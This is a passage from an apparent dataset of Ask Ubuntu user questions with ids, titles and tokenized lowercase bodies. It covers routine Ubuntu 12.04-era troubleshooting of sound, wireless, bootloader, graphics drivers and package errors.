process /etc/kernel/postinst.d at /var/lib/dpkg/info/linux-image-3.2.0-26-generic.postinst line 1010. dpkg : error processing linux-image-3.2.0-26-generic ( -- configure ) : subprocess installed post-installation script returned error exit status 2 no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-3.2.0-26-generic ; however : package linux-image-3.2.0-26-generic is not configured yet . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.2.0.26.28 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfiguredno apport report written because maxreports is reached already no apport report written because maxreports is reached already errors were encountered while processing : linux-image-3.2.0-26-generic linux-image-generic linux-generic e : sub-process /usr/bin/dpkg returned an error code ( 1 )
157871	ripping a dvd into an iso image using k9 but getting no sound	i m trying to rip a dvd using k9 from ubuntu software center.i have saved it as an iso file.i have burned it three times and each time the video turns out great but i have no sound in vlc or a standalone video player.anyone ran across this or know a fix for it ? maybe know a program that works ? i have noticed k9 saying audio '' unknown ''
157872	i ca n't seem to download quickly	i have tried using the ubuntu software center but it fails . also apt-get seems to fail as well . i 'd love some help . thanks in advance .
157873	is it possible to change the terminal font ?	i would like to change the font in the terminal , how can i achieve this ?
157878	why does n't ubuntu on vmware recognize my wireless connection ?	i have installed ubuntu 11.04 on vmware on a windows 7 host os . wireless connection is working fine on the host os but ubuntu is not even recognizing it . what can be the problem here ? why is ubuntu not recognizing wireless network ? what can i do to be able to use wireless network in the guest os in vmware .
157884	wireless switch stuck off- hp touchsmart tx2	the light stays red when i use the switch . first day with ubuntu , looks nice so far but no internet . tried a few solutions on here , but they all seem very hardware-specific . please talk me through what to do and why it works . my machine is an old hp touchsmart tx2 with 12.04 64 bit . what other information would be helpful ?
157887	internet sharing not working after one hop	i have a broadband adsl connection to a modem router . i have connected this router 'a ' to another wifi-modem router 'b ' through a lan cord . internet works fine in windows with wifi connection . however , in linux ( android , fedora , ubuntu ) it connects to the wifi network but i am not able to use internet . please note that all settings are automatic dhcp .
157890	will xtile work ?	xtile is a kind of window tiling tool . i 've tried to download the *.deb package from the following link : http : //www.ubuntugeek.com/x-tile-gnome-applet-for-your-panel-or-optionally-a-standalone-application.html when i double-click on it from nautilus ubuntu software centre opens up and shows an internal error . any headers on what the problem could be ?
157891	skype and vlc sounds sizzle/distorted/bad	i have the same problem as described in the questions skype notification sounds sizzled and bad sound on login to skype . but it is not only the login , notification , but also when talking to somebody . i tried the solution to remove/re-install skype and most of the solutions in this questions , e.g . checking mixer , sound settings and installing alsa-hda-dkms ( incl . system restart ) . after installing skype ( and even after upgrade to skype 4.0 ) in ubuntu 12.04 ( amd 64 ) there was no sound at all . i followed the first step of the soundtroubleshootingprocedure and at least there is now sound : sudo add-apt-repository ppa : ubuntu-audio-dev/ppa ; sudo apt-get update ; sudo apt-get dist-upgrade ; sudo apt-get install linux-sound-base alsa-base alsa-utils gdm ubuntu-desktop linux-image-`uname -r` libasound2 ; sudo apt-get -y -- reinstall install linux-sound-base alsa-base alsa-utils gdm ubuntu-desktop linux-image-`uname -r` libasound2 ; killall pulseaudio ; rm -r ~/.pulse* ; sudo usermod -ag `cat /etc/group | grep -e '^pulse : ' -e '^audio : ' -e '^pulse-access : ' -e '^pulse-rt : ' -e '^video : ' | awk -f : ' { print $ 1 } ' | tr '\n ' ' , ' | sed 's : , $ : :g'` `whoami` the jittering sound would sometimes disappear , e.g . on the echo-testcall after replaying the recorded part . and i noticed that if i let music play in the rhythmbox and then start skype , the sound is fine . so i have a weak solution , but i would be glad it would work without this detour . in vlc when i play , restart after pause i have to same jittering sound . as requested : my sound card is a an `` amd high definition audio device '' called advanced micro devices ( amd ) hudson azalia controller ( rev01 ) , subsystem lenovo device 21ea ( according to sysinfo ) on a lenovo thinkpad edge 525 .
157897	how to get hdmi sound work on a basic 12.04 install ?	i have just installed ubuntu 12.04 ( precise ) and am using it on my tv . the hdmi sound does n't work . all i have installed is : the preinstalled codecs and other software , a kde game called ksirk , supertuxkart , and gimp 2.8 . i am using a custom built computer , and a lg tv . my processor is pentium ( r ) dual-core cpu e5200 @ 2.50ghz dual core , os is 32-bit , and i have 1.7gb of ram ( after having to remove one stick due to failure ) . i am also running windows xp on the computer .
157898	keyboard layout hung up	i have a problem with the keyboard layout . i use ubuntu 12.04 . i configured the layout so that i could interchange between a norwegian and hebrew keyboard . the system language of my ubuntu is norwegian and both my user name and password are written in latin characters . i had been typing hebrew for some while , then i left the computer for a break . when i came back , i had to unlock the account but then the keyboard layout was locked in a hebrew keyboard layout and i could not switch back to norwegian . i tried to reboot the machine and to turn it off and on but not matter what i did i could only type hebrew letters . so it was impossible for me to login with my own account which had a password written with latin characters . finally i gave up and installed ubuntu from scratch . now i would like to be able to change between hebrew and norwegian keyboard layouts but i do n't dare to do it before i know what went wrong . any solutions ?
157901	firefox drag and drop url	can any one help me with this problem of firefox ? i have two firefox windows open . now i want to drag a url link from one window to the another , but i ca n't do it in ubuntu 12.04 i can do this easily in windows . i can not switch to the other window when i click and hold a link to be dropped ... anyone experience the same problem and have a solution ?
157904	where do i get source code for the java apis ?	i want to know where are the java api 's stored . i use openjdk 7 . i want to edit some of the code of a class to suit my needs and therefore i want to know where are these api 's stored . can anyone please answer this question ?
157915	if i can not boot from cd or usb , how do i install ubuntu ?	not able to install ubuntu from usb or cd . i have ubuntu 12.04 installed but i have to reformat my laptop . neither cd nor usb boots . i want something like that can help me boot .
157917	how do i recover a btrfs partition that will not mount ?	the installation for 12.04 kept failing , and the solution was to have the installer ignore the btrfs partition that i have previously been using for /home . now that it 's installed , i 've been trying to get it to mount the btrfs partition so that i can access my 70gb of files . it wo n't mount , and btrfsck errors out with the following three lines : parent transid verify failed on 31302336512 wanted 62455 found 62456 parent transid verify failed on 31302336512 wanted 62455 found 62456 parent transid verify failed on 31302336512 wanted 62455 found 62456 can someone please tell me how to get this partition working ? i 've read online that i can probably recover the data using btrfs-restore , but i ca n't find that program anywhere .
157925	how do i skip the grub menu on a dual-boot system ?	i have ubuntu and windows 7 installed and dual booting via grub2 . 99/100 times i will boot into ubuntu . i want to speed up my time for booting into ubuntu and really the grub2 prompt is the part that adds the most time . so , i want to disable the prompt . i would prefer to be able to set it up so i can hold shift or similar at boot if i wish to show it . but i do n't mind editing a config file or similar in ubuntu to show it again if need be . so how can i do this ? my /etc/default/grub file : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout=10 grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 ''
157926	how can i open/show the default content-help-dialog with quickly ?	if i create a quickly-project there is a default menubar which shows the help-dialog ( contents - `` index.page '' from help/c - folder ) . how can i manually show the content-help dialog ? there is no code in the created default-project . background : i have more than one dialogs in my app . i want to show/reach the content-dialog in every dialog of my app and also not only from the menubar ...
157927	close window in window overview	i have several terminal windows open . when i click on the terminal icon in the launcher , all terminal windows are shown in an overview . is it possible to close a windows from the overview without bringing every window to focus and close it manually . it would be nice , if i could close a window in the overview by using the middle mouse button .
157928	which loaded kernel modules are unused and should i disable them ?	i want to know the kernel modules which are not being used now . so , that i can disable them from loading at boot time ? is there any method to see which kernel modules ( of course , loaded ) are not in use ?
157931	ubuntu 12.04 : replacing pulseaudio with alsa ?	because of skype sound issues i was told to replace pulseaudio with alsa . i only found a solution for ubuntu 10.10 . does this still work for ubuntu 12.04 precise pangolin ? or does it still not make any sense to replace pulseaudio with alsa ( as jorge castro said in his comment ) ? or should i stick to pulseaudio and alsa ? i do n't want to mess up my system . thanks !
157941	how to make machinarium work again ?	i am on ubuntu 12.04 ( 64b ) and bought machinarium a while ago . i played with no problems for some days and wanted to play again today . however , when i tried to play , i got this error : ./machinarium : error while loading shared libraries : libgtk-x11-2.0.so.0 : can not open shared object file : no such file or directory how can i solve it ?
157942	how can i open a file in my terminal , like nautilus does it ?	i want to be able to open files like my operating system does from console . e.g . a .pdf file should be opened with evince or whatever the default application to open pdfs is . all the other things should work too ; images - > eog , text files - > gedit and so on . i hope that there is a solution for this , it would be really practical .
157946	script for filing call recordings into date folders	we have an ip pbx that is running asterisk and is set by the manufacturer to delete call recordings after a certain time period . i am backing these up to an ubuntu server using rsync so that we are able to store them indefinitely . the issue that i have is that all of the recordings are all placed into a single directory . conveniently the files are named in the same structure : year.month.day.hour.min.sec-callref-extension-callerid.wav what i would like to do is set up a directory structure that would be year/month/day ( with the month being correctly ordered ) , then move each of the files into the corresponding order . personal note : i am confident at working with ubuntu at the command line but do n't have experience of running or automating scripts so advice is greatly welcomed . ( happy to learn ! ) thanks in advance . the script that was supplied earlier is working great . i have come upto a further slight issue . i am using a crontab to rsync ippbx to ubuntu server , then another to file these recordings using the script below . each evening the rsync is re-downloading all the recordings as it thinks that the destination folder is empty . i have two questions : can the rsync be incorporated into the script below so that one a single file is used ? can the script understand what has already been downloaded so that it is only downloading new files ?
157952	audio does n't work on imac 20 '' early 2008 with ubuntu 12.04	i tried with several guides , but no one worked out . the last one was http : //ubuntuforums.org/showpost.php ? p=3697702 & postcount=5 . it seemed to be good , but when i run the ./configure command it says : checking for gcc version ... ./configure : eval : line 4919 : syntax error near unexpected token ` ) ' ./configure : eval : line 4919 : `my_compiler_version=4.6.3-1ubuntu5 ) ' how can i get my audio working ?
157955	how to change monitor refresh rate ( ati radeon hd 6450 ) on ubuntu 12.04 ?	i want to change refresh rate from 60hz to 75hz , but xrandr shows that this card does not support 75hz refresh rate . on windows this not work too . can somebody help me ?
157965	hard drive has only one ubuntu partition , how do i install windows to dual-boot ?	i 'm using 12.04 64-bit on my thinkpad r61i with an un-partitioned 160gb hard drive . can i partition my hard drive and install windows for dual boot without having to reformat my laptop ? if yes , how would i do that ?
157966	where is x-chat when it is minimized to tray ?	when i click at x-chat 's option minimize to tray , where is it going ? i am unable to find it .
157967	12.04 compiz closed error message	win 7/12.04 dual boot system . win 7 works fine , but 12.04 rarely boots normally- i have to use repair . after 12.04 does boot , cyclical system error message/report error message/administrator log on . i was able to get reason `` compiz closed /usr/bin/compiz '' and contact askubuntu.com . thanks for any help .
157969	dhcp not working on new install	a new kubuntu 12.04 install is not getting ip addresses from either the wired connection nor from any wireless connection . the cables / router ports / wifi adapter / access point are all known good and work with other equipment . i suspected a failed nic but seeing how the wireless connections also are n't working via usb wifi adapter , that eliminates the nic as a possible source of the issue . what other hardware might be shared between the wired ( onboard nic ) and wireless ( usb wifi adapter ) ? i stress that with the wifi adapter i see other networks , but can not get an ip address from them either . testing with a kubuntu 11.10 livecd has the same results . i notice that there is no /etc/dhcp/dhclient.conf file .
157972	playonlinux install menu is empty	i am using ubuntu 12.04 . i installed playonlinux by adding their repository to software sources . my playonlinux version is 4.1.2 when i try to install a program the install menu is totally empty . so , i tried running playonlinux from terminal and this the output i got . traceback ( most recent call last ) : file `` /usr/share/playonlinux/python/install.py '' , line 315 , in search self.apps = codecs.open ( variables.playonlinux_rep+ '' /configurations/listes /search '' , 'r ' , '' utf-8 '' ) file `` /usr/lib/python2.7/codecs.py '' , line 881 , in open file = builtin.open ( filename , mode , buffering ) ioerror : [ errno 2 ] no such file or directory : '/home/karthik/.playonlinux//configurations/listes/search' traceback ( most recent call last ) : file `` /usr/share/playonlinux/python/install.py '' , line 434 , in addapps self.apps = codecs.open ( variables.playonlinux_rep+ '' /configurations/listes/4 '' , 'r ' , '' utf-8 '' ) file `` /usr/lib/python2.7/codecs.py '' , line 881 , in open file = builtin.open ( filename , mode , buffering ) ioerror : [ errno 2 ] no such file or directory : '/home/karthik/.playonlinux//configurations/listes/4' i searched the playonlinux forums and found a discussion which matched the problem . eventhough , i followed the instructions there , the problem did not get solved . also , i am behind an authenticated proxy server . i filled the proxy server details in the playonlinux preferences . i would really like get playonlinux working . thanks in advance .
157975	low latency midi and virtual sound studio	i wish to connect my musical keyboard to linux ( figured that part out ) but i would like to know my options for virtual grand pianos .
157978	how to insert a page in a djvu file without quality loss ?	so i have a djvu file generated from a pdf ( under linux ) : pdf2djvu -- dpi=300 -o out.djvu in.pdf the pdf contained scanned notes . in these days , i only got the djvu file . the problem : i found a page missing ( between 359 and 360 in the djvu ) . how can i insert a jpg file between the mentioned sites in the djvu file ? ( i do n't want degraded quality or much bigger djvu file size , just the 180 kbyte jpg in it ) solution could be os independent . ( windows , linux )
157981	setting device label using e2label or tune2fs causes bad magic number in super-block while trying to open /dev/sda5	i am trying to set a label to my partitions , i used the e2label and tune2fs command with sudo but it cause the following error e2label : bad magic number in super-block while trying to open /dev/sda5 could n't find valid filesystem superblock what is the problem ?
157984	`` python module helpers not found '' error when using quickly	i am here asking why quickly is displaying this : error : python module helpers not found -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- do you want to continue ( this is not safe ! ) ? y/ [ n ] : i am unsure whether i should continue or not , and i have been unable to find someone who has had similar problems . this error occurred when i ran quickly submitubuntu any help on this matter would be greatly appreciatd : ) .
157989	installing g++ on 8.04	i am running ubuntu 8.04 ( currently i do not have the option to upgrade due to hardware problems ) . i need to get g++ onto my installation but as this is no longer supported i am unable to use the traditional apt-get approach . what are my options ? are ubuntu packages configured specifically for each version ? for example could i manually download a later version of gcc and g++ that do not originally ship with 8.04 ( say the 10.04 version for example ) and build them from scratch ? do the compilers work in this way in the sense that they have a version per ubuntu version or are they maintained as separate entities ? ? i do not know enough about ubuntu internals really and always use apt-get to obtain/update any packages i need . if it is possible to do it this way is there a way to be certain that i have everything i need with regards to utility packages needed by g++ for the installation ? ?
157991	how to install libreoffice 3.5.4 in ubuntu 12.04 ?	i want to know how to install libreoffice 3.5.4 in ubuntu 12.04 . i heard that it has many improvements over its earlier versions .
157998	is the 2.4mb wubi installer blocked in china ?	using an existing wubi will download all the files successfully , however the os will be unable to install because of bad files . is the mirror site of ubuntu installation files gfwed in china ?
158001	nvidia driver problems after upgrading to 3.2.0-26 on ubuntu 12.04 64bit	after installing latest updates i ca n't set screen resolution higher than 1024x768 ; every time after the boot i get a message could not apply the stored configuration for the monitors ( note : removing ~/.config/monitors.xml stopped the message , but not the problem ) i can boot with 3.2.0-25 and the graphics look normal . here 's what i have in /var/log/apt/term.log ( excerpt ) : setting up linux-image-3.2.0-26-generic ( 3.2.0-26.41 ) ... running depmod . update-initramfs : deferring update ( hook will be called later ) examining /etc/kernel/postinst.d . run-parts : executing /etc/kernel/postinst.d/dkms 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic error ! problems with depmod detected . automatically uninstalling this module . dkms : install failed ( depmod problems ) . module rolled back to built state . run-parts : executing /etc/kernel/postinst.d/initramfs-tools 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic update-initramfs : generating /boot/initrd.img-3.2.0-26-generic run-parts : executing /etc/kernel/postinst.d/pm-utils 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic run-parts : executing /etc/kernel/postinst.d/update-notifier 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic run-parts : executing /etc/kernel/postinst.d/zz-update-grub 3.2.0-26-generic /boot/vmlinuz-3.2.0-26-generic generating grub.cfg ... found linux image : /boot/vmlinuz-3.2.0-26-generic found initrd image : /boot/initrd.img-3.2.0-26-generic found linux image : /boot/vmlinuz-3.2.0-25-generic found initrd image : /boot/initrd.img-3.2.0-25-generic found linux image : /boot/vmlinuz-3.2.0-24-generic found initrd image : /boot/initrd.img-3.2.0-24-generic found linux image : /boot/vmlinuz-3.2.0-23-generic found initrd image : /boot/initrd.img-3.2.0-23-generic found linux image : /boot/vmlinuz-3.0.0-17-generic found initrd image : /boot/initrd.img-3.0.0-17-generic found memtest86+ image : /boot/memtest86+.bin i went to `` additional drivers '' and saw some updates available there , but an attempt to install them failed , leaving the following in /var/log/jockey.log ( long log , pasted here ) . the full log wo n't fit in the question , so i 'm showing $ fgrep 'error ' /var/log/jockey.log 2012-06-30 17:29:57,897 warning : modinfo for module vmxnet failed : error : modinfo : could not find module vmxnet 2012-06-30 17:29:57,937 warning : modinfo for module wl failed : error : modinfo : could not find module wl 2012-06-30 17:29:58,072 warning : modinfo for module nvidia_96 failed : error : modinfo : could not find module nvidia_96 2012-06-30 17:29:58,240 warning : modinfo for module nvidia_current failed : error : modinfo : could not find module nvidia_current 2012-06-30 17:29:58,293 warning : modinfo for module nvidia_current_updates failed : error : modinfo : could not find module nvidia_current_updates 2012-06-30 17:29:58,351 warning : modinfo for module nvidia_173_updates failed : error : modinfo : could not find module nvidia_173_updates 2012-06-30 17:29:58,385 warning : modinfo for module nvidia_173 failed : error : modinfo : could not find module nvidia_173 2012-06-30 17:29:58,420 warning : modinfo for module nvidia_96_updates failed : error : modinfo : could not find module nvidia_96_updates 2012-06-30 17:29:58,455 warning : modinfo for module ath_pci failed : error : modinfo : could not find module ath_pci 2012-06-30 17:29:58,478 warning : modinfo for module fglrx_updates failed : error : modinfo : could not find module fglrx_updates 2012-06-30 17:29:58,531 warning : modinfo for module fglrx failed : error : modinfo : could not find module fglrx 2012-06-30 17:29:58,588 warning : modinfo for module omapdrm_pvr failed : error : modinfo : could not find module omapdrm_pvr 2012-06-30 17:29:59,537 warning : modinfo for module nvidia_current failed : error : modinfo : could not find module nvidia_current 2012-06-30 17:29:59,613 warning : modinfo for module nvidia_173_updates failed : error : modinfo : could not find module nvidia_173_updates 2012-06-30 17:29:59,686 warning : modinfo for module nvidia_173 failed : error : modinfo : could not find module nvidia_173 2012-06-30 17:29:59,764 warning : modinfo for module nvidia_current_updates failed : error : modinfo : could not find module nvidia_current_updates 2012-06-30 17:30:29,544 warning : modinfo for module nvidia_current_updates failed : error : modinfo : could not find module nvidia_current_updates 2012-06-30 17:30:29,545 error : xorgdriverhandler.enable ( ) : package or module not installed , aborting i 'm not sure if it 's a bug , as the first log shows some errors . what can i try ?
158004	how do i write and submit applications for ubuntu ?	i 've been a linux user for a while , and c++ programmer for a while longer . is there a way to write applications for ubuntu , and how to submit them ?
158008	how to view cd contents	i know its a stupid question but i 'm new to ubuntu . is n't a window supposed to pop up and say cd inserted or something as in windows . i looked up in the file browser but there is nothing related to cd drive . is the problem with my drive ?
158009	google chrome 20 : how to workaround poor performance with flash ?	after the update to `` google chrome 20.0.1132.47 '' google-chrome started to lag . it gets stuck for couple of seconds and then it resumes . the issue seems to start after i enter any flash site running google-chrome from terminal results in following errors : alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_direct.c:980 : ( snd1_pcm_direct_initialize_slave ) unable to install hw params alsa lib pcm_dsnoop.c:623 : ( snd_pcm_dsnoop_open ) unable to initialize slave alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_direct.c:980 : ( snd1_pcm_direct_initialize_slave ) unable to install hw params alsa lib pcm_dsnoop.c:623 : ( snd_pcm_dsnoop_open ) unable to initialize slave alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_direct.c:980 : ( snd1_pcm_direct_initialize_slave ) unable to install hw params alsa lib pcm_dsnoop.c:623 : ( snd_pcm_dsnoop_open ) unable to initialize slave alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_direct.c:980 : ( snd1_pcm_direct_initialize_slave ) unable to install hw params alsa lib pcm_dsnoop.c:623 : ( snd_pcm_dsnoop_open ) unable to initialize slave alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_direct.c:980 : ( snd1_pcm_direct_initialize_slave ) unable to install hw params alsa lib pcm_dsnoop.c:623 : ( snd_pcm_dsnoop_open ) unable to initialize slave alsa lib pcm_dmix.c:957 : ( snd_pcm_dmix_open ) the dmix plugin supports only playback stream alsa lib pcm_direct.c:980 : ( snd1_pcm_direct_initialize_slave ) unable to install hw params alsa lib pcm_dsnoop.c:623 : ( snd_pcm_dsnoop_open ) unable to initialize slave firefox does not have any problem . can you suggest a workaround to get google chrome to work as it previously did ?
158015	embedding a back and forward arrows , home button , and download manager in a quickly application	i have downloaded a set of icons to use for my web browser that i 'm creating and would like to use . i know how to add the icons , but i only know the code for the refresh button . my question is what is the code for the back and forward arrows ? it would also be so helpful if i would know the code for the home button and how to make the web browser manage downloads . i 'm using webkitgtk as the web browser view . the images are found here
158017	how can i capture keystroke “print screen” in gnome 3 ?	have sound indicating “picture was taking – a click sound” but do not have any file to examine – where is it ?
158018	black bars around screen ? catalyst control center problem ?	i just newly install ubuntu 12.04 , and im running an hdmi cable from my computer to my asus monitor . now in windows 7 , i did not have these black bar issues running at 1080p . but now in ubuntu , i have these black bars . i installed the ati catalyst control center , and i went to go in to fix the scaling but it is grayed out . as you can see , even with the override box checked i still can not set the scaling . the monitor was set to a lower resolution to hopefully fix it but that did not work either . does anyone know how to fix this ? thanks .
158020	avoid apt-get update while installing softwares on ubuntu , possible ?	i want to install a 27kb lens ( reddit-lens : here ) & this `` apt-get update '' is going to download 20mbs ( ! ) of data for the same . i want to avoid this update bcoz i am on a limited bandwidth connection . i also tried to install .deb file ( 27kb ) for this lens but it says `` dependancy is not satisfiable gir1.2-unity-3.0 '' . i went on to http : //www.pkgs.org to get that package & there is no version available for ubuntu 12.04 . what should i do ? can i install softwares without updating cache ? is that update necessary ? also installation of some softwares requires updating cache while others dont , why ?
158024	recover files from a sata drive from usb	i 've damaged the drive i had in my windows laptop and now i want to try to recover as many files as possible . i know very little about linux though . i have ubuntu 10.04 . i have a docking station for the drive and it is connected to my linux machine . the drive appears in disk utility . unfortunately , this is where i have no idea where to proceed . any help is appreciated and i can provide more info if needed .
158025	where can i find the ubuntu-one brand ( logo ) ?	in order to put some contents into ubuntu one , i 'm looking for the ubuntu-one brand . i found this website , but they are n't talking about ubuntu-one . does someone know where i can find it ? we are participating to the ubuntuappshowdown , so we are looking for an open-source logo .
158026	default terminal text and background both black	upgraded to 12.04 and default terminal is black text on black background . i can right-click in the terminal and change the color , but the `` back up '' window is also black on black .
158027	can i join a conference call in skype ?	running ubuntu 12.04 , with the latest skype . how can i join a conference call in skype ? skype does n't seem to allow joining conference calls , only creating new ones . can it be done ?
158030	how do i drag and drop a file from nautilus into a minimized window icon on the unity taskbar ?	for example : in gnome-shell i can drag a file from nautilus to the upper left part of the screen , all windows ( open and minimized ) display on the screen , and then i can drop the file in one of the windows . in unity is this a bug or just a missing feature ?
158031	how can i make display resolution changes persistent	i successfully got my computer to display at 1440x900 resolution using the following steps . the problem is , i ca n't figure out how to make the changes persistent even after restarting the system . here are the steps use xrandr to make sure that the new mode can fit within the maximum framebuffer size code : xrandr | grep maximum use gtf to create a mode line code : gtf 1440 900 59.9 add new mode using xrandr code : xrandr -- newmode `` 1440x900_59.90 '' 106.29 1440 1520 1672 1904 900 901 904 932 -hsync +vsync add this newly added mode to the desired output ( vga/lvds etc ) code : xrandr -- addmode vga 1440x900_59.90 choose the new mode code : xrandr -- output vga -- mode 1440x900_59.90 any suggestions for making these changes persistent ?
158033	how to see list of repository ?	i want to see a list of repositories so that i can add them to ubuntu . how can i acquire such a list . is there a command i can use ?
158044	why nvidia-smi displays only 127mb memory out of 512mb available ?	i have a geforce 210 and i use the nvidia-current driver . i know my card has 512mb but that command shows differently . i also noticed that after upgrading from 11.04 my graphics ' performance got worse . it feels like the system does n't use 512mb anymore , but 127mb instead . nvidia-setting , though , shows 512mb available . i use 12.04 , fully updated . what do you guys think about this ? + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- + | nvidia-smi 3.295.40 driver version : 295.40 | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- + | nb . name | bus id disp . | volatile ecc sb / db | | fan temp power usage /cap | memory usage | gpu util . compute m. | |===============================+======================+======================| | 0 . geforce 210 | 0000:02:00.0 n/a | n/a n/a | | n/a 42 c n/a n/a / n/a | 64 % 81mb / 127mb | n/a default | | -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+ -- -- -- -- -- -- -- -- -- -- -- + -- -- -- -- -- -- -- -- -- -- -- | | compute processes : gpu memory | | gpu pid process name usage | |=============================================================================| | 0 . not supported | + -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -+
158047	printing page numbers in okular	i 'm using okular to print some pdf files . how can i add page number to each page ? edit : screen shots that lucio requested : ( i have no print menu ! i have file > print > > options )
158050	unity-like dashboard for gnome fallback ?	is there any way i can run the unity dashboard ( or something similar , like bolt for gnome 3 ) in gnome fallback ?
158052	is there a way to backup your package configuration ?	for example , if i wanted to help out with trying edge ( in this case quantal ) , but i wanted to be able to revert to a stable-ish system if some update caused a problem -- how would i accomlish this task ?
158053	gtkpositiontype	the problem is that i have to use function attach_next_to ( ) on grid , but the optional parameter of that function is gtkpositiotype for side on which i can attach some new widget od the grid . what ever i try gtk.pos_left gtk.gtk_pos_left or something else , i get error 'gi.repository.gtk ' object has no attribute 'pos_left my question is how to get gtkpositiontype in python , i can see in documetation that it is enum type , but if i wrote self.grid.attach_next_to ( 1,1,1 ) if i supose that first argument if for lef , i get error that function expect 6 arguments . pls . help , and sry for bad english
158059	audio and lock-screen hotkeys broken	some days ago ( probably after some package updates ) some of my hotkeys stopped working . it is no longer possible to change the volume via the volume up / volume down hotkeys on my keyboard and neither is to lock the screen via strg+alt+l , it simply happens nothing . when i am in the keyboard-settings of my ubuntu and click the option for volume down and then pressing the hotkey the hotkey is properly detected . does anyone have an idea how to fix this , or is it a bug ?
158060	ubuntu app submission wo n't allow the `` free '' bubble to be checked	i am at the final stages of the ubuntu app developer showdown , and i 'm right at the point where i am submitting my app . the problem i run in to however , is that even though buy is at $ 0.00 , it will not allow me to click on the `` free '' button , and keep that configuration saved . so when i go to `` preview your app '' , it shows it saying `` usd $ 0.00 -- -- buy '' instead of saying `` free -- -- install '' . so i was wondering if it makes any difference or not .
158067	harddisk slows my touchpad	believe me please . i 've seen questions in forums like `` how much does a software weigh ? '' and i hope this question will not be mocked like that : ( but when i plug in my external hard disk 1tb sandisk , external power in my laptop ubuntu 12.04 lts desktop ... 64-bit ... dell latitude e6520 my touch-pad becomes pretty inactive . when i remove it , it acts normal . driver problems ? please guide.. let me know if u need any logs/specifications more ...
158070	to active update manager	i dont have update manager in my netbook . my company seems like disabled it . i am still on ubuntu 10. many software never updated.can any one please help me out .
158079	unable to switch between workspaces	i unlocked my workspace icon from the launcher with the assumption i could just use ctrl+alt+arrow keys to navigate between workspaces . now ctrl+alt+arrow keys wo n't switch between screens , and i can not find the icon to launch it . any ideas ? i have went into the keyboard shortcut and verified that is the correct shortcut .
158081	dual booting ubuntu 12.04 and windows 7	i have installed ubuntu 12.0 alongside windows 7 . when i boot up and the select screen comes up the up/down selector buttons become inoperable and ubuntu is automatically selected .
158084	nvidia 550m drivers	first to say , i am newbie , to the linux world and in situation where i have to get used to using ubuntu . my system is : i7-2630qm 8gb ram with 750gb hd + nvidia 550m ( 1gb ) since i was facing problems with wubi - `` slow ubuntu '' , i installed it on a separate partition , of 80gb ( 10gb swap , 40gb home , 30gb root ) . the system was running fine , before i started using some `` cfd '' ( graphics dependent ) application . i needed to use `` paraview '' a graphics software , to design some engineering stuff . following the installation problems , i installed something called `` messa '' on my system . the software works but , now my system is `` dead-slow '' . even with the computer at an idle state , the laptop , is pretty slow , and with huge annoying fan noise . i was tried running some similar applications with windows , and it turns out that its not a hardware , but has to do with the gpu drivers . following some forums , i installed the `` nvidia-current '' and now everything is the same . i know , there are many solutions on this forum for nvidia-driver updates , but as you see , nothings working my way . please someone , tell me what is that i am doing wrong : ( this is the output from my terminal for the command lspci | grep 'intel' 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 ( rev 05 ) 00:1b.0 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller ( rev 05 ) 00:1c.0 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 ( rev b5 ) 00:1c.1 pci bridge : intel 